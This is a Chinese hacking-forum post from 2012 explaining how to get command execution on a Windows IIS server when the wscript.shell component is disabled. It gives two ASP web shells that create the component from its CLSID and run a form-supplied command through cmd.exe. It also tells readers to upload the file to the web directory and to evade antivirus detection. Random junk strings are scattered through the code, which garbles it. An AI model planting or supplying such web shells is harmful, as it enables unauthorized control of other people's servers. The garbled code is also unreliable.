中国网络渗透测试联盟

标题: 没有wscript.shell组件提权方法 [打印本页]

作者: admin 时间: 2012-10-21 09:08
标题: 没有wscript.shell组件提权方法

可能有很多人，看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
) h" W8 W) m% [/ k! f# b
一般当闭上面组件时，你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。) i- k* s$ h& Y! N3 e% e/ n' k
要想让运行命令可以试试这种方法，成功率为五五之数。
4 g# [. {! |8 p* p! y' {
把下面代码复制：* |+ A' D5 G) u6 @; |- r. J1 f0 q
<%4 g$ j& ]8 J3 d1 t* m* Q& V. m
end if, z, G; o& ]" x5 h2 n
response.write(”")
$ i2 ~' }) \1 T; d7 H% m) i
On Error Resume O- s: P2 M4 S
Next
6 i% K0 _- n% Q* N, S" F2 M* ~
response.write oScriptlhn.exec(”cmd.exe /c” &
% P7 C3 w$ w1 G
request(”c”)).stdout.readall& w7 g3 b# x7 ^3 L9 _
response.write(”")0 [. i6 L- K* f1 ]. N% s
response.write(”")
/ U) i5 E J) x% B2 f
response.write(”
: e) q6 b9 g& p+ l" J5 e4 e& k
“)" `- z1 S9 u* H- k/ d: W* z
response.write(”")
% j5 A! ]9 I$ k
%>
+ C! z. C {" V. j/ f& S8 X f
保存为一个asp文件，然后传到网站目录上去
. r# g# p: k, I# g1 C
运行的时候可能会出现两个问题，第一是运行了为什么运行不了命令，这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
" G9 l, Y8 j p4 l; N6 L/ T
我用此成功运行过cacls命令。
. _- p/ \+ n. |7 k( c2 A
第二那就是运行时出错，可能限制某些代码执行6 E0 Q0 b! A% n7 R
无wscript.shell组件提权又一个方法5 l! F" j: q. |; m6 l- j+ S# t
<object runat=server id=oScriptlhn scope=page
q6 W% y8 d$ g5 R& Y
& W- v8 Q2 X* E8 A8 H. K/ Z! {) r s
classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
$ B; m7 p( f0 j
<%if err then%>
3 B3 e6 w- O% O* l
<object runat=server id=oScriptlhn scope=page
6 ~, J6 S5 v: z }
' b5 V" q6 @ m/ K" ~! c; I
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>. I" q5 e3 Y" [1 b1 m
<% 4 g6 r' E. B8 h+ `% L2 e
end if
response.write(”<textarea readonly cols=80
4 ~) O" t9 @4 f$ d* t- g
1 g- f2 I# p* [
rows=20>”) % ~; I' T4 w8 H
On Error Resume Next 4 t2 H3 Q: h7 @( f! H% ?7 O
response.write
0 `, c/ D' q; w4 o. L0 h( \3 D
4 _5 O2 a2 ~9 b' C8 Q+ K: o
oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall( d2 U3 d ]$ [
response.write(”</textarea>”)
4 V( L1 Q" b( c! z1 N& z
response.write(”<form
! X+ X& A6 ^6 O
3 @$ {; }- b- x0 X* H
method=’post’>”) , }4 }% P6 y2 B/ K& Z1 M2 U2 \! i V
response.write(”<input type=text name=’c'
' _# D. ?' `% T# j) V! C: @
4 X" f( B0 f- p' H: b# m
size=60><br>”) + b! a8 }: y' ]" Y8 \3 H" P
response.write(”<input type=submit & ]. O1 v( {! Z$ a
* b0 |/ M- \; u) v( X! S5 J
value=’执行’></form>”)
, I6 X+ O6 M9 j0 J1 Q
%>
% |( K" x1 E# g2 L9 a$ _
保存为ASP，此代码可能被杀，请注意免杀。
# @2 X1 \8 ?, @& H
原理：有些人把wscript.shell改名了,但是clsid没有变，所以调用这个clsid就等于调用ws组建
2 v$ w4 r$ ^' e) Q$ Z8 g

复制代码

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)